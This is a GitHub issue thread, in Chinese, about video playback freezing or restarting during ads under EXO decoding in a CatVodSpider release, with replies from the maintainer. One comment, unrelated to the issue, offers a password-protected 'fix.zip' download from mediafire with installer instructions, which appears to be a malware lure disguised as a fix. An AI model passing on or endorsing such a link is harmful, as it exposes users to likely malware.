### ISSUE TITLE
[issue][2.4.7] EXO 硬解處理視頻廣告會卡住

### ISSUE THREAD

**Issue by linitfor** [FongMi/CatVodSpider#85]
如題，似乎從2.4.5之後， EXO 硬解處理視頻廣告會卡住，EXO 軟解在切換廣告時會出現直接直接跳出，從頭播放視頻。

PS. 比對使用2.3.0 版本的EXO 軟解，可以完整播放，不會有視頻畫面卡住，或者從頭播放的問題。

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by FongMi** [comment]
2.5.4 已修正

**Comment by FongMi** [comment]
请提供测试的播放地址

**Comment by FongMi** [comment]
不用测试了，这是 exo 升级的问题吧，我也不可能降版本，估计大多人的设备都不会卡。
